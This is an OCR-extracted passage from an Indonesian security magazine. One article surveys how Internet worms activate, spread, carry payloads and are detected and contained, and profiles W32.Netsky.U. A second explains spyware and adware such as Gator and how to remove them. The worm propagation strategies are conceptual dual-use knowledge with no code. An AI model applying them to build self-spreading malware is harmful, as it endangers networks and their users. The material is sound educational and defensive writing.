Aktivasi dengan intervensi user. Merupakan proses akti-vasi paling lambat karena membutuhkan intervensi useruntuk mengeksekusi worm tersebut, disadari maupuntidak oleh user tersebut. N amun karena sosialisasi yanggencar dilakukan m engenai bahaya worm dan virus, userdapat lebih cermat dengan t idak mengeksekusi programasing atau membuka attachment e-mail dari orang yangtidak dikenalnya, hal ini tentu akan memperlambat prosesaktivasi worm. Tetapi pembuat worm tidak putus asa de-
ngan kondisi tersebut sehingga mereka melakukan tekniksocial engineering seperti yang dilakukan oleh virusMelissa yang seolah-olah mengirimkan informasi pentingdari orang yang telah dikenal oleh korban atau pesan-pesan personal lainnya yang dikirimkan oleh virusILOVEYOU. Walaupun Melissa adalah sebuah virus macropada program Microsoft Word namun dengan intervensiuser maka penyebaran Melissa di Internet sempat men-jadi ancaman yang paling menakutkan.
Aktivasi terjadwal. Met ode aktivasi worm y ang lebih ce-
pat adalah dengan menggunakan proses terjadwal padasistim (scheduled system proces). Ada banyak programyang berjalan pada lingkungan desktop maupun serveruntuk melakukan proses sesuai dengan jadwal yang dibe-rikan. Metode ini tetap membutuhkan intervesi manusianamun kali ini intervensi attacker yang dibutuhkan. Se-bagai contoh, program auto-update dari sistim yang me-lakukan proses updating ke server vendor. Dengan mela-kukan update ke remote host sebagai master, seorangattacker yang cerdik dapat memanfaatkan proses tersebutuntu k menyebarkan worm dengan terlebih dahulu m e-nguasai remote host atau gateway pada network maupundi Internet dan mengganti atau menginfeksi file yang di-butuhkan pada proses update dengan kode program worm.
Ak tivasi mandiri. Metode aktivasi mandiri adalah metodetercepat worm dalam menggandakandiri, menyebar, danmenginfeksi host korban. Metode ini paling populer digu-nakan oleh para penulis worm. Umumnya worm yangmenggunakan metode ini memanfaatkan kelemahan-kelemahan sekuriti (security flaws) pada service yangumum digunakan. Sebagai contoh, worm CodeRed yangmengeksploitasi Webserver IIS. Worm akan menyertakandirinya pada service daemon yang sudah dikuasainya ataumengeksekusi perintah-perintah lain dengan privilegeyang sama dengan yang digunakan oleh daemon tersebut.Proses eksekusi tersebut akan berlangsung ketika wormmenemukan vulnerable service dan melakukan eksploitasiterhadap service tersebut.
1.2. Mekanisme Penyebaran
Worm menginfeksi host korban dan memasukkan kodeprogram sebagai bagian dari program worm ke dalamny a.Kode program ter sebut dapat berupa machine code, atauroutine untuk menjalankan program lain yang sudah adapada host korban. Dalam proses penyebarannya, wormharus mencari korban baru dan menginfeksi korban de-ngan salinan dirinya. Proses pendistribusian tersebut da-pat berlangsung sebagai proses distribusi satuan (dari satuhost ke host yang lain) atau sebagai proses distribusi ma-sal (dari satu host ke banyak host). Proses distribusi masaldipertimbangkan sebagai metode penyebaran tercepat de-ngan asumsi batasan yang digunakan adalah satuan wak-
tu . Terdapat beberapa mekanisme penyebaran yang digu-
A
Autonomous Intrusion AgentsAutonomous Intrusion AgentsInternet Worm atau cacing yang dikenal terdapat internet sesungguhnya adalah Autonomous
Intrusion Agents. Memiliki kemampuan menggandakan diri dengan memanfaatkan Security Flaws.Jim Geovedi & Bayu Kr isna ([email protected] & [email protected]) membahasnya untuk
anda demi menambah wawasan mengenai Worm yang saat ini sedang booming menghiasi internet.
COMPUTER SECURITYCOMPUTER SECURITY
-
8/9/2019 NeoTek Vol. IV - No. 11
10/48
NeoStart
10 NeoTek Vol. IV No. 11
nakan worm un tuk menemu kan calon korban yaitu de-ngan m elakukan scanning, mencari korban berdasarkantarget list yang sudah dipersiapkan terlebih dahulu olehpenulis worm atau berdasarkan list yang ditemukan padasistim korban maupun di metaserver, serta melakukanmonitoring secara pasif.
Scanning . Metode scanning melibatkan proses probingterhadap sejumlah alamat di Internet dan kemudian
mengidentifikasi host yang vulnerable. Dua format seder-hana dari metode scanning adalah sequential (mencobamengidentifikasi sebuah blok alamat dari awal sampaiakhir) dan random (secara acak).
Penyebaran worm dengan metode scanning baik sequen-tial maupun random, secara komparatif dapat dikatakanlambat, namu n jika dikombinasikan dengan aktivasi se-cara otomatis, worm dapat menyebar lebih cepat lagi.Worm yang menggunakan metode scanning biasanyamengeksploitasi security holes yang sudah ter identifikasisebelumnya sehingga secara relatif hanya akan mengin-feksi sejumlah host saja.
Metode scanning lainnya yang dinilai cukup efektif ada-
lah dengan menggunakan bandwidth-limited routine (se-perti yang digunakan oleh CodeRed, yaitu dengan mem-batasi target dengan latensi koneksi dari sistim yang su-dah terinfeksi dengan calon korban yang baru), mendefi-nisikan target yang hanya terdapat pada local address (se-perti dalam sebuah LAN maupun WAN), dan permutasipada proses pencarian.
Scanning yang dilakukan worm t idaklah spesifik terh adapaplikasi sehingga attacker dapat menambahkan sebuahexploit baru pada sebuah worm yang sudah dikenal. Seba-gai contoh, worm Slapper mendapatkan muatan exploitbaru dan menjadikannya sebuah worm baru yaitu Scalper.
Secara um um, kecepatan scanning yang dilakukan adalahterbatas pada kombinasi faktor seperti; jumlah mesin-mesin yang vulnerable, desain dari scanner, dan kemam-puan network monitoring system yang mampu meng-identifikasikan keberadaan worm dengan meningkatnyatrafik yang cukup signifikan.
Target Lists. Sebuah worm dapat memiliki target list yangsudah ditentukan sebelumnya oleh penulis worm terse-but. Dengan target list yang sudah ditentukan terlebihdahulu membuat sebuah worm lebih cepat dalam menye-bar, namun tentu saja penyebaran tersebut akan sangatterbatas karena target berdasarkan sejumlah alamat di In-ternet yang sudah ditentukan.
Selain itu, worm dapat menemukan list yang dibutuhkanpada host korban yang sudah dikuasainya, list ini umum-
nya digunakan oleh worm yang metode penyebarannyaberdasarkan topologi network. Informasi yang didapatcontohnya adalah IP address sistim tersebut dan wormmengembangkannya menjadi sebuah subnet pada LANatau WAN.
Target list juga dapat diperoleh pada metaserver (serveryang memberikan informasi sejumlah server yang memi-liki service yang sama). Sebagai contoh, metaserverGamespy memiliki daftar server yang menyediakanservice game online. Sebuah worm yang m emanfaatkanmetaserver akan melakukan query terlebih dahulu untu kmengetahui keberadaan target yang baru. Metode ini jugadapat mempercepat proses penyebaran sebuah worm yangmenyerang webserver, worm dapat menggunakan Google
atau mesin pencari lainnya sebagai metaserver untukmenemukan target.
Monitoring secara Pasif. Worm pasif tidak mencari kor-bannya, namun worm tersebut akan menunggu calonkorban potensial dan kemudian menginfeksinya. Walau-pun metode ini lebih lambat namun worm pasif tidakmenghasilkan Anomalous Traffic Patterns sehingga kebe-radaan mereka akan sulit diketahui. Sebagai contoh, anti-worm CRClean tidak membutuhkan aktivasi user, wormini menunggu serangan worm CodeRed dan turu nannya,
kemudian melakukan respon dengan melakukan counter-attack. Jika proses counter-attack berhasil, CRClean akanmenghapus CodeRed dan menginfeksi korban denganmenginstal dirinya pada mesin. Sehingga CRClean dapatmenyebar tanpa melakukan proses scanning.
2. Mot ivasi dan Muatan
2.1. Motivasi Serangan
Walaupun sangat penting unt uk mengetahui t eknologiyang digunakan oleh Internet worms, namun untuk dapatmemahami ancaman yang berasal dari sebuah worm seca-ra alami perlu dipahami motivasi dari intruders (sepertipenulis worm), serta jika memungkinkan dapat meng-identifikasi siapa sebenarnya intr uder t ersebut. Ada ba-nyak motivasi yang menyebabkan sebuah worm dibuatnamun berikut ini adalah motivasi umum yang menda-sari serangan worm.
Pride and Power. Intruder (juga pembuat worm) termoti-vasi untuk mendapatkan kekuasaan dan show-off penge-tahuan mereka dengan merusak host orang lain. Intrudersini umu mnya tidak terorganisir dengan baik dan mene-mukan targetnya secara random. Jika mereka menemukansebuah sistim yang lemah dan vulnerable terhadap se-buah at tack maka mereka akan melangsungkan attackpada sistim tersebut.
Keuntungan Komersial. Berkaitan dengan perkembangandunia ekonomi yang semakin hari semakin bergantung
pada kinerja komputer untuk menjalankan operasionalbisnis sehari-hari, serangan elektronik yang ditujukan kesebuah domain dapat secara serius menganggu t ransaksiyang sedang berlangsung. Sebuah serangan worm dapatdilakukan untuk mendapatkan profit dengan melakukanmanipulasi finansial atau membatasi ruang-gerakkompetitor.
Pemerasan. Karena sebuah worm dapat dibuat untuk me-langsungkan serangan DOS (Denial of Service) tanpahenti, pemerasan terhadap sebuah perusahaan dapatdilakukan dan serangan baru dapat dihentikan jika terjaditransaksi pembayaran sesuai yang diinginkan olehattacker. Motivasi ini lebih terorganisi secara individualmaupun kelompok.
Protes. Seseorang yang memiliki pengetahuan yangcukup untuk menulis sebuah worm dapat melangsungkanserangan jika ia merasa dirugikan oleh suatu pihak ter -tentu. Ia melakukan protes terselubung dengan menye-barkan worm di Internet. Protes tersebut juga dapat ber-dampak negatif pada institusi yang menjadi target, sepertiSCO dan Microsoft yang baru-baru ini mendapatkan se-rangan DOS yang ditujukan kepadanya. Protes politikjuga dapat menjadi muatan dari serangan worm. Sebagaicontoh, worm Yaha Mail dibuat sebagai tool dari protespolitik yang diklaim sebagai pro India dan melakukanserangan DOS pada websites milik pemerintah Pakistan.
Terorisme. Secara obyektif, worm dapat dimanfaatkan
oleh kelompok teroris. Oleh karena ada banyak sistimkomputer yang terhubun gkan ke Internet berlokasi di
-
8/9/2019 NeoTek Vol. IV - No. 11
11/48
NeoStart
Vol. IV No. 11 NeoTek 11
negara-negara maju, maka sebuah serangan worm dapatditujukan sebagai bentuk terorisme. Attacker dapat me-nyertakan muatan teror Al-Qaeda atau kelompok-kelompokanti-globalisasi lainnya untuk menyerang.
2.2. Muatan (Payload)
Berkaitan dengan motivasi penyebaran, muatan yang adapada sebuah worm dapat beragam. Berikut ini adalah mu-
atan yang sering ditemukan pada worm.Tanpa muatan atau non-fungsional. Sebuah worm y angmemiliki bug pada kode program yang berhubungan me-tode penyebaran biasanya gagal untuk menyebar, namunworm yang memiliki bug pada muatannya tetap dapatmenyebar dan menimbulkan efek serius seperti pening-katan network tr affic atau secara aktif melakukan identi-fikasi host yang vulner able.
Backdoor. Worm CodeRed II membuat sebuah backdoorpada host korban yang memungkinkan semua orang da-pat mengeksekusi program pada korban dari sebuahbrowser. Hal tersebut juga memicu peningkatan seranganworm anti-CodeRed yang berusaha mengeksploitasi back-door tersebut.
Remote DOS . Muatan umum dari worm adalah kemam-puan unt uk m elakukan serangan DoS (Denial of Service).Worm tersebut memiliki tool yang dapat melakukan se-rangan terhadap sebuah target yang sudah ditentukan atautergantung pada komando seseorang yang membuatnyamampu melakukan serangan DDoS (Distributed Denial ofService).
Melakukan update. Sejumlah worm terdahulu sepertiW32/Sonice memiliki muatan untuk melakukan update.W32/ Sonice melakukan proses query terhadap sejumlahwebsite untuk mendapatkan kode program yang baru ba-gi dirinya. Kemampuan ini dapat digunakan oleh DDoStool untuk melakukan update pada program-program
yang m enjadi zombie. Jika kontrol un tuk melakukan up-date masih terus berlangsung maka sebuah modul exploitdapat disertakan sehingga menjadikan worm tersebutmampu menyebar lebih cepat dan mendapatkan korbanlebih banyak lagi.
Spionase dan Pengumpulan Data. Worm dapat dilakukansebagai alat untu k melakukan spionasi dan pengum pulandata dengan m encari keyword tertentu seperti nomor kar-tu kredit atau informasi penting lainnya pada dokumen-dokumen yang tersimpan pada host yang sudah menjadikorban.
Pengerusakan Data. Ada banyak virus dan worm yangmelakukan pengerusakan data seperti Chernobyl dan
Klez, yang memiliki perintah-perint ah penghapusan data.Karena worm dapat menyebar dengan cepat, merekadapat mulai menghapus atau memanipulasi data dari awalproses infeksi.
Pengerusakan Hardware. Walaupun sebagian besar BIOSmemiliki kemampuan untuk mencegah proses reflashing,beberapa worm memiliki routine yang mampu melaku-kan pengerusakan terhadap BIOS jenis tertentu.
Coercion. Dengan muatan yang coercive, sebuah wormtidak menimbukan kerusakan kecuali jika worm ter sebutdiganggu. Sepert i worm yang memberikan pilihan padauser, mengijinkan worm tersebut tinggal pada sistim dantidak melakukan pengerusakan, atau menghapus wormtersebut namun menimbulkan efek yang bur uk dengankerusakan pada sistim.
3. Mendeteksi Internet Worms
Sebuah firewall telah dikembangkan sebagai alat untu kmendeteksi anomali traffic yang berasal dari Internet danmenghasilkan logfile yang memberikan peringatan bahwaworm menyerang dengan sebuah port tertentu sebagaitarget. Firewall dapat melakukan blocking akses sampaiadministrator melakukan analisis dan r ecovery jikadiperlukan.
Masalah yang umum ditemukan dalam melakukan res-pon otomat is secara akurat adalah m endeteksi dan me-nganalisa sebuah worm yang sedang beroperasi danmenginfeksi ke sebuah network. Bagian ini mendiskusi-kan strategi-strategi yang telah eksis maupun baru dalammendeteksi keberadaan sebuah worm.
Detektor dapat berupa sebuah komputer atau device lainyang berdiri sendiri, terletak pada DM Z (De-MilitarizedZone), atau pada sebuah backbone, yang memiliki ke-mampuan mendeteksi secara lokal atau terpusat. Apapundetektor yang digunakan haruslah sensitif dalam skalanetwork yang besar untu k mengurangi false positives danfalse negatives. Detektor dapat dikatakan berhasil jika
mampu mendeteksi kejadian anomali dari beberapa tipeworm, kejadian anomali tersebut dapat diketahui dari polatrafik yang dihasilkan sebagai konsekuensi dari teknikpenyebaran worm tersebut.
3.1 Deteksi pada Host
Host detection . Program peer-to-peermaupun protokolWindows sharing dapat digunakan sebagai medium pe-nyebaran worm, akibatnya mekanisme query worm samaseperti yang dihasilkan oleh program peer-t o-peer biasa.Hal tersebut menyebabkan proses deteksi pada network-level akan mengalami kesulitan kecuali implementasi IDSdilakukan untu k mengenali pola-pola tersebut. Dalam im-plementasinya, IDS akan menganalisa pola-pola tert entu
pada trafik berdasarkan signature database yang dimilikinya.Anti-virus Behavior Blocking. Behavior blocking adalahteknik yang digunakan antivirus dalam menghentikanprogram-program jahat dalam melakukan aksinya. Wa-laupun dinilai sebagai upaya y ang berhasil, teknik ini ti-dak diberdayakan secara luas karena faktor usability danfalse positives.
W ormholes dan Honeyf arms. Sebuah honeypot adalahsebuah host yang ditujukan untuk dikuasai oleh intruderdalam upaya mendeteksi dan menganalisa perilaku intru-der. Honeypot yang didistribusikan pada sebuah network(honeynet) dapat membentuk detektor yang akurat ke-cuali faktor harga (terutama hardware dan admistrationcosts) menjadi faktor penghalang diimplementasikannyahoneynet.
Sebagai contoh implementasi honeypot yang hemat ada-lah dengan membuat sebuah honeypot system pada net-work yang terpisah dari workstations atau server dan me-lakukan tr affic redirection pada port-port tertentu, yangdiduga sebagai trafik yang digunakan oleh worm untukmenyebar, ke honeypot tersebut. Sebuah honeypot dapatmenggunakan teknologi virtual machine untuk membuatimage dari banyak sistim yang vulnerable.
3.2. Deteksi pada Network
Deteksi pada LAN atau WAN. Sebuah mesin yang terin-feksi oleh worm akan menghasilkan trafik scanning yang
dapat dideteksi. Proses deteksi dapat dilakukan pada gate-way atau IDS yang diletakkan diantara gateway dan LAN
-
8/9/2019 NeoTek Vol. IV - No. 11
12/48
NeoStart
12 NeoTek Vol. IV No. 11
atau WAN.
Deteksi pada level ISP atau Backbone. Telah diketahuibahwa untuk menyebarkan dirinya sebuah umumnyaworm melakukan proses scanning terlebih dahulu untukmenemukan target yang baru. Meningkatnya networktraffic ISP atau backbone secara dramatis dapat mengin-dikasikan bahwa worm telah menyerang networktersebut.
4. Respon dan Recovery
4.1. Respon
Malware seperti worm dan virus dapat menyebar lebihcepat dari pada kemampuan manusia untuk menganalisadan meresponinya. Sebuah strategi pertahanan yang baikmenghadapi worm haruslah dapat dilakukan secara oto-matis. Sebuah respon otomatis dapat memperlambat danmembatasi ruang-gerak worm.
Respon otomatis yang diberikan biasanya berupa blockingterhadap aktifitas worm. Kelemahan respon otomatisyang umum adalah terjadinya respon terhadap false posi-tive dan false negative. False positive adalah situasi dima-
na respon diberikan namun tidak terjadi indikasi adanyaworm, sement ara false negative adalah situasi dimana wormbenar-benar menyerang namun respon tidak diberikan.
Keputusan unt uk m enanggapi keberadaan worm padanetwork h aruslah bijak. Berarti dalam pengambilan se-buah keputusan tersebut haruslah berdasarkan analisateknis yang melibatkan banyak aspek seperti statistik,usage policy , maupun security advisory .
Host Response. Sebuah proses respon pada sistim kompu -ter akan melibatkan personal firewall yang mampu mem-baca alerts yang dihasilkan oleh host-based IDS. Pada le-vel ini, respon yang diberikan dapat menjadi lebih efektifdalam membendung aktifitas worm.
Network Response. Respon pada level ini haruslahmemungkinkan u ntuk mengkombinasikan teknikblocking ketika mendapat alert dan mampu memilah kelasdari trafik yang diduga sebagai worm yang sedangmenyebar. Network-based IDS seperti snort dan preludedapat digunakan untu k mengidentifikasi keberadaanworm dengan menganalisa network t raffic secara pasif.
ISP Response. Walaupun tingkat kesulitan dalam melaku-kan respon otomatis pada level ini cukup tinggi, namunproteksi dengan skala sistim yang lebih besar dapat men-jadi pertimbangan. Implementasi respon otomatis pada le-vel ISP haruslah terlebih dahulu teruji dengan baikkarena terjadinya false positive dan false negative dapatdengan mudah terjadi.
4.2. Recovery
Proses recovery dipertimbangkan sebagai salah satu upayaunt uk memperlambat penyebaran worm. Dengan memu -lihkan kondisi sistim yang terin feksi setidaknya akan me-ngurangi sebuah penyebaran baru dari worm. Beberapametode berikut adalah u paya dalam melakukan recoveryterhadap serangan worm.
Anti-worms. Walaupun bersifat ilegal dan kurang praktis,sebuah ant i-worm atau worm put ih dapat menu tupi secu -rity holes dan membatasi ruang-gerak worm jenis lain.Terlihat sangat atraktif namun beberapa batasan signifi-kan membuatnya bersifat tidak praktis, selain itu faktor
hukum membuat ant i-worm tidak dibenarkan secarahukum. Batasan yang signifikan dari anti-worm adalah
keterbatasannya untuk memperbaiki kerusakan yang di-timbulkan oleh satu jenis worm saja.
Sekurang-kurangnya terdapat 3 (tiga) jenis anti-wormyang pernah ada di Internet:
? Cheese worm, yang m enyebar dengan m enggunakanbackdoor y ang dibuat oleh 1ion worm.
? Code Green, yang m emanfaatkan h ole yang dibuat
oleh CodeRed II.? CRClean yang memberikan respon terhadap serangan
CodeRed II.
Distribution patch dan update. Metode recovery denganmendistribusikan patch update untuk program-programyang vulnerable pada sebuah sistim komputer dinilai se-bagai metode yang efektif. Proses distribusi dapat dilaku-kan oleh vendor software maupun adminstrator yang me-nangani sejumlah besar host pada LAN atau WAN.
Salah satu kekurangan metode ini adalah ketika intruderdapat menggunakan worm untuk menguasai sejumlahbesar host dan melakukan DOS ke host lain yang akanmelakukan respon terhadap serangan worm tersebut. Tar-
get dari DOS biasanya adalah vendor dar i program-program yang vulnerable dan dimanfaatkan oleh worm.
5. Kesimpulan
Sebagai autonomous intrusion agents, Internet wormsmerupakan ancaman bagi network dalam skala kecil mau-pun besar. Setelah diketahui bagaimana metode umumpenyebaran, mekanisme, motivasi dibuatnya sebuah worm,dan deteksi keberadaan worm pada sebuah host maupunnetwork, maka perlu penanganan secara serius dalam me-nanggulangi wabah Internet worms. Bagaimana mengan-tisipasi serangan worm saat ini maupun dimasa menda-tang yang lebih beragam menjadi sebuah pekerjaan ru -mah baru yang tidak mudah. Perlu kerjasama berbagai
pihak terkait seperti penyelenggara jasa layanan aksesInternet agar tidak terjadi dampak yang lebih buruk.
6. Referensi
1. Vern Paxson, Stuart Staniford, and Nicholas Weaver,How to 0wn t he Internet in Your Spare Time, Proceedingsof the 11th USENIX Security Symposium (Security '02),2002.
2. David Moore, Colleen Shannon, Geoffrey Voelker andStefan Savage, Internet Quarantine: Requirements forContaining Self-Propagating Code, Proceedings of the2003 IEEE Infocom Conferen ce, San Francisco, CA, Apr il2003.
3. Jose Nazario, The Future of Internet Worms, BlackhatBriefings, July 2001.
4. CERT, CERT Advisory CA-2000-04 Love Letter Worm,http://www.cert.org/advisories/CA-2000-04.html.
5. Arno Wagner, Thomas Dbendorfer, Bernhard Plattner,Roman H iestand, Experiences with Worm PropagationSimulations, ACM Workshop on Rapid Malcode(WORM) 2003, November 2003.
6. Nicholas C Weaver, Warhol Worms: The Potential forVery Fast Internet Plagues,http://www.cs.berkeley.edu/~nweaver/warhol.html.
7. Eugene H. Spafford, The Internet Worm Program: AnAnalysis, ACM SIGCOMM Computer Commu nicationReview, 19(1):17--59, January 1989.
-
8/9/2019 NeoTek Vol. IV - No. 11
13/48
NeoStart
Vol. IV No. 11 NeoTek 13
8. Paul Boutin, The Fix Is In Programmers can stopInternet worms. Will they?,http://slate.msn.com/id/2081943/
9. Symantec, Security Response,http://securityresponse.symantec.com/
10. Networm.org, The Worm Information Center,http://www.networm.org/
7. Tambahan
7.1. W32.Netsky.U
W32.Netsky merupakan sebuah worm yang menganda-kan dirinya melalui e-mail yang dikirimkan secara masal.Memiliki banyak varian, sampai tulisan ini dibuat varianterbaru worm W32.Netsky adalah W32.Netsky.U@mm(juga dikenal sebagai W32/Netsky.u@MM, W32/Netsky-U, WORM_NETSKY.U, Win32.Netsky.U). Menginfeksisistim operasi Windows 2000, Windows 95, Windows 98,Windows Me, Windows NT, dan Windows XP.
Muatan worm W32.Netsky.U adalah melakukan DoS kesejumlah website pada tanggal 14 April 2004 sampai 23
April 2004, selain itu worm ini akan mengirimkan banyake-mail ke alamat yang diperoleh pada file yang terdapatpada host korban.
W32.Netsky juga menginstal sebuah backdoor yang me-mun gkinkan seseorang dapat login ke dalam sistim t anpamelewati proses otentifikasi yang semestinya.
Setelah berhasil mengeksploitasi host korban, W32.Netsky.Uakan meny alinkan diri sebagai % Windir% \ SymAV.exe(% Windir% merupakan variable dimana lokasi instalasidefault Windows berada). Selanjutnya worm tersebutakan melakukan serangkaian perintah seperti membuatmut ex, membuat sebuah file MIME-encoded, dan me-nambahkan sebuah entry pada registry Windows.
Worm W32.Netsky.U menginstal sebuah backdoor yangmendengarkan port TCP 6789 yang memun gkinkan oranglain unt uk mengirimkan executable file dan kemudiansecara otomatis mengeksekusinya.
Pada tanggal 14 April 2004 sampai 23 April 2004, wormakan melakukan serangan DoS ke sejumlah website se-perti: www.cracks.am, www.emule.de, www.kazaa.com,www.freemule.net, dan www.keygen.us.
Untuk menyebarkan dirinya, worm W32.Netsky.U akanmelakukan pencarian sejumlah file seperti file yang ber-ekstensi .asp, .cgi, .html, .php, dan lain-lain guna menda -patkan daftar alamat e-mail yang nantikan akan dikirimisalinan worm tersebut. Dengan ukuran attachment sebe-sar 18,432 bytes dan target yang banyak, network yangterkena worm ini dapat dipastikan akan mengalami gang-guan dengan terjadinya lonjakan trafik pada transmisi e-mail.
Informasi detail mengenai W32.Netsky.U serta bagaima-na cara mengatasinya dapat dilihat pada website Symantec,www.symantec.com/avcenter/venc/data/[email protected]
7.2. Lonjakan Network Traffic
Selama bulan Februari sampai Maret 2004, networkPT. BoNET Utama (salah satu subnet ISP IndoNET yangberlokasi di Bogor), telah terjadi serangkaian gangguanpada network akibat penyebaran worm yang menginfeksisejumlah besar klien dial-up dan wireless.
Umumnya, POP (Point of Presence) Bonet Pajajaran setiapharinya mendistribusikan traffik dengan rata-rata 750 kbps.
Ketika worm sedang aktif untuk melakukan scanningatau mengirimkan e-mail secara massal, terjadi lonjakannetwork traffic yang cukup drastis mencapai 90 Mbps.
8. Kredit
Michael S. Sunggiardi dan Team BoNET, Judith MS,Hengky Anwar, Stephen Chen, Syam A. Yanuar,
Y. Fery Wibowo, Chiank, Dominick Dreiser, RezaMuh ammad, Randi Malikul Mulki, Arif Wicaksono,Indra Kusuma, D. Wangsa Sunary a.
CoreBSD Digital Research Group adalah sekelompok anak muda yang
tertarik pada bidang computer security dan sistim operasi komputer
*BSD. Kelompok yang tidak pernah mendeklarasikan secara resmi
kapan berdirinya, berkumpul pada sebuah ruang chat #corebsd di IRC
server Efnet. Informasi lengkap mengenai kelompok CoreBSD dapat
dilihat pada website h ttp:// corebsd.or.id/
Gambar 1. Lonjakan Network Traffic; penyebaran worm yang
menginfeksi sejumlah besar klien dial-up dan wireless.
Gambar 2. Lonjakan Network Traffic; worm melakukan scanning ataumengirimkan e-mail secara massal.
-
8/9/2019 NeoTek Vol. IV - No. 11
14/48
NeoStart
14 NeoTek Vol. IV No. 11
PABILA KITA SEDANG BERSELANCAR DI INTERNET MA-ka kita akan menemui hal-hal yang baru, mu laidari perkembangan teknologi internet itu sendiri
sampai perkembangan software. Namun pernakah ketikaanda berkunjung ke sebuah WebShopping un tuk m elihat-lihat produk dan info yang sedang anda cari? Tiba-tibamuncul pop-up menu yang menginformasikan untukmenginstal sebuah program baru untuk mengawasi kinerjaPC anda. Tetapi setelah di-install malah lebih banyak meng-ganggu kegiatan berselancar anda.
Kejadian di atas mun gkin sering kita alami, bahasan kaliini akan menjelaskan apa itu scumware?Scumware adalahsebuah sebutan untuk tool penggangu seperti yang telahdisebutkan sebelumnya di atas. Scumware sendiri terdiridari spyware, adware, sneakware, dan scamware.
Spyware adalah sebuah program kecil yang memiliki ke-mampuan layaknya seperti mata-mata dengan merekamaktivitas berselancar anda di internet dan lain sebagainya,kemudian tool ini akan menyimpan rekaman tersebut danmengirimkannya ke si pembuat tool ini. Mirip dengankeylogger dan trojan.
Adware mungkin sudah tidak jarang lagi ditemukan bah-kan hampir setiap kali tersambung ke internet programini akan selalu menawarkan jasa-jasanya dalam bentukgambar atau bentuk lainnya, dan juga bisa memata-mataiseperti spyware.
Spamware juga bersifat sama seperti adware. Semua tooldi atas merupakan kerjaan dari sebuah perusahaan dengancara mengiklankan produk mereka secara massal dan mainhantam kromo semua pengguna internet.
Bagaimana anda bisa terinfeksi scum ware?Seperti di awalpembahasan, tergiur akan tawaran program gratis untuk diinstal di PC anda, tanpa disadari jika anda mengikuti ta-waran itu adalah sebuah keputusan yang salah. Salah satudari scumware ada Gator/ GAIN, dimana gator merupakansebuah spyware yang paling dibenci pengguna internet.
Gator memiliki beberapa komponen didalamnya antaralain: gator, OfferCOmpanion, Trickler, GAIN, GMT.exe,CMESys.exe dan lainnya. Gator sendiri menyebar denganmeleburkan dirinya ke dalam file-file program sharingseperti kazza, iMesh dan lainnya.
Gator memiliki 2 tujuan ut ama yaitu :
? ? engirimkan iklan-iklan kepada user.
? Mengumpulkan informasi tentang kebiasan user danmengirimkan kembali ke server utama gator.
Menghilangkan Gator
Gator terinstall di dalam folder C:\Program files\ Gator\ dandi registry windows dengan nama GAIN diHKEY_LOCAL_MACHINE>Software>Microsoft>Windows>Current
version>Run . GMT sendiri terdapat di C:\program
files\common files\GMT\ dan di C:\Windows\StartMenu\Programs\StartUp\sedangkan file Cmiie bisa ditemu-kan di C:\program files\Common Files\. Anda bisa menghapusfile-file bawaan gator tersebut, namun untuk menghapusregistry keynya anda sebaiknya mem-back up terlebihdahulu sebelumnya agar terhindar dari masalah.
Selanjutnya non-aktifkan startup Gator di MSconfig-Startup lalu cari GAIN ataupun Gator, dan hilangkantanda centangny a.
Hilangkan Scumware Dengan NoAdware
Apabila anda ragu dengan cara konvensional seperti di atasmaka banyak sekali tools-tools untuk menghilangkanscumware. Namun untuk memilih yang benar-benar meng-hilangkan memang sukar, karena terkadang program antiadwarenya sendiri telah terjangkiti scumware.
Ketika browse untuk mencari referensi tentang scumwaresaya mendapatkan referensi tentang tool-tool anti scumwaredan salah satunya adalah NoAdware. Ketika saya coba dirumah, program ini berguna untuk melakukan scanningPC dari ware-ware yang tidak berguna. Silahkan andamendownloadnya di www.noadware.net.
Dengan interface yang friendly user, tool ini dapat andadengan mudah tetapi tool ini shareware dengan m asaaktif trial 45 hari, ditambah lagi menu Remove untuk
A
ScumwareScumwareBerselancar di Internet yang biasa kita lakukan sehari-hari, ternyata tidak terlepas dari hal-hal yang
dapat mengganggu kenyamanan bahkan yang terburuk yaitu merusak privacy. Andi Ismayadi([email protected]) membeberkan hal yang mungkin akan kita temui nantinya ketika
berselancar di internet seperti spyware dan lain sebagainya.
COMPUTER SECURITYCOMPUTER SECURITY
Gambar 2. Program NoAdware
Gambar 1. MSconfig-Startup
-
8/9/2019 NeoTek Vol. IV - No. 11
15/48
NeoStart
Vol. IV No. 11 NeoTek 15
yang berfungsi untuk menghilangkan scumware di non-aktifkan. Namun anda dapat membeli serial number-nyadi website resminya.
Klik tombol scan My PC, maka NoAdware segera melakukanscanning di PC anda dari scumware. Akan ter lihat nant i-nya file-file scumware apa saja yang terdapat dalam PC.Bahkan keylogger pun ikut t erlihat keberadaannya. Jikameng-klik nama dari scumware ter sebut, terlihat di kolom
item description keterangan tingkat bahaya dan tipe dariscumware yang tertangkap menyusup di PC.
Tools lain yang sebanding dengannya adalah adaware darilavasoft, www.lavasoftu sa.com.
Tool lain yang dapat digunakan dalam memerangi scumwareyang sangat saya kagumi dikarenakan sifatnya sepertiAnti Virus PC-Cillin yang bisa memonitor aktivitas sebuahvirus. ZeroSpyware, program yang dimaksudkan adalahsebuah Real Time Anti Spyware Monitor Program , ke-mampuannya memonitor file-file yang masuk maupun
yang telah bera-da didalam kom-puter y ang didu-ga sebagaiSpyware yang
selanjutnya nan-ti akan dicekal(cegah tangkal)jika ditemukanakan memasuk-kannya ke ka-
rant ina. Didalam karantina anda dapat melihat keterangandari sebuah spyware sendiri, dimana letak keberadaannyadan menghapusnya.
Download tool ini di www.zerospyware.com , pilihan yangbijak jika kita memutuskan untuk memiliki dan menginstaldi PC kita, terlebih lagi apabila sering menggunakan inter-
net sebagai bagian dari alat bekerja.Fitur lainnya adalah men jaga setting browser anda. Ketika
anda telahmelakukansettingbrowseranda denganmenghilang-kan autocomplete,
sebuahspyware juga memiliki kemampuan untuk merubahnyaagar auto complete ter sebut dapat di aktifkan dan mengi-rimkan log kepada pembuatnya. ZeroSpyware menjagasetting browser tersebut dari kenakalan Spyware.
Fitur yang lainnya yang membuat saya kagum adalah se-mua badan program ini memiliki Animasi. Ini yang belumsaya temukan dari software-software terkemuka lainnya,selain software multimedia tentunya, bahkan AntiVirussendiri tidak memakai sistem animasi. Mungkin denganmemakai animasi seperti ini maka pembuat ZeroSpywareingin melihat sisi Friendly User-nya lebih ditampilkandan dari segi pengguna juga dapat menggunakan dan me-mahami t ool ini sebagai teman dan bukan sebagai satpam.
